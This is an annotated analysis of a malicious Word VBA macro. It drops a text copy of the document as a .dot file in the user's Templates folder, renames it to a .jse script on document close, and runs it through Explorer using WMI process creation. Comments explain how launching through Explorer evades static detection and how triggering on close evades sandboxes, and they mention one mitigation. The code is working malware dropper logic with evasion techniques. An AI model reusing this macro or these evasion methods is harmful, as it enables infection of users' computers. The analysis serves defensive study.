Private malFilePath As String ' String declaration containing the path of the malicious auto correct dictionary Private Function Repl(a As AutoCorrectEntries, r As Range, r1 As Range) As Boolean If "jikol" <> r.Text Then End If ' Always returns false End Function Sub AddToTheAutoCorrectList() Dim r As Range, r1 As Range Dim par As Paragraph, bo As Boolean Dim pars As Paragraphs Dim ACE As AutoCorrectEntry Dim ACEs As AutoCorrectEntries Dim ActD As Document Dim FerD As String Dim Polk As String Set ActD = ActiveDocument ' This is the file /word/document.xml Set pars = ActD.Paragraphs ' Represents a list of paragrahps of said file Set r1 = Selection.Range Set r = Selection.Range Set ACEs = Application.AutoCorrect.Entries On Error Resume Next For Each par In pars ' Iterate over the paragraphs of the document (/word/document.xml file) r1.Start = par.Range.Start r1.End = r1.Start r1.MoveEndUntil vbTab ' Select text until the vbTab character r.Start = r1.End + 1 ' The next range begins 1 char after the first range r.End = par.Range.End - 1 ' And ends one character before the paragraph ends If Len(r1.Text) > 0 Or Len(r.Text) > 0 Then ' Check if there is text in any of both ranges If Len("jkopft") > 0 Then ' This always evaluates to True bo = Repl(ACEs, r, r1) ' This always evaluates to False Else bo = True ' This else part will never be executed End If If bo Then ACEs.Add r1.Text, r.Text ' Never gets executed End If Next ' Only one iteration of the loop takes place newMalFilePath = Replace(malFilePath, ".dot", ".Jse") ' replaces the .dot in the string containing the path to the 2angola.dot file with .jse Name malFilePath As newMalFilePath ' Renames the malware file "C:\Users\\AppData\Roaming\Microsoft\Templates\2angola.dot" to "C:\Users\\AppData\Roaming\Microsoft\Templates\2angola.jse" Set p = GetObject("winmgmts:Win32_Process") ' Creates an object to start processes from vba res = p.Create("Explorer """ & newMalFilePath & """", Null, Null, pid) ' The string evaluates to 'Explorer "C:\Users\\AppData\Roaming\Microsoft\Templates\2angola.jse"' ' This will start the explorer to start the jse file. In most windows installations the jse file extension will be executed with the windows script host by default ' By using only the Explorer to run the file, you can circumvent detection by static analysis. Calling "Wscript.exe" is way more obvious ' Changing the default program to open jse files will protect you from this specific attack End Sub Private Function Deza() ' Reads the template path of the current document and appends "/2angola.dot" to it malFilePath = ActiveDocument.AttachedTemplate.Path & "\2angola.dot" Deza = malFilePath ' return value End Function Private Sub saveFile(filename As String) ' Creates a file with the passed file name ActiveDocument.SaveAs FileName:=filename, FileFormat:=wdFormatText, ' This is where the /word/document.xml gets transformed to ascii only and stored on disk LockComments:=False, Password:="", AddToRecentFiles:=False, WritePassword:="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:=False, SaveNativePictureFormat:=False, SaveFormsData :=False, SaveAsAOCELetter:=False, InsertLineBreaks:= False, AllowSubstitutions:=False, LineEnding:=wdCRLF End Sub Private Sub Document_Close() ' Will be executed when the word document is being closed ' When closing the document the function fills the recently created files with malicious contents ' This is where the infection starts taking place AddToTheAutoCorrectList End Sub Private Sub Document_Open() ' Will be executed when the word document is being opened saveFile Deza ' Creates a text-only copy of document.xml with the name returned by the function "Deza" saveFile Deza & "u" ' Creates a text-only copy of document.xml with the name returned by the function "Deza" and appends a "u" to it ' Results are two new files were created: ' C:\Users\\AppData\Roaming\Microsoft\Templates\2angola.dot ' C:\Users\\AppData\Roaming\Microsoft\Templates\2angola.dotu ' Until here nothing bad happened. The computer is not really infected by anything. Only two empty files were created. ' If not executed manually until this point, the owner is "safe" ' Only when the document will be closed those files will be executed. This is also one of the main reason why sandboxes ' do not detect this kind of vba very well, since most sandboxes won't close the document End Sub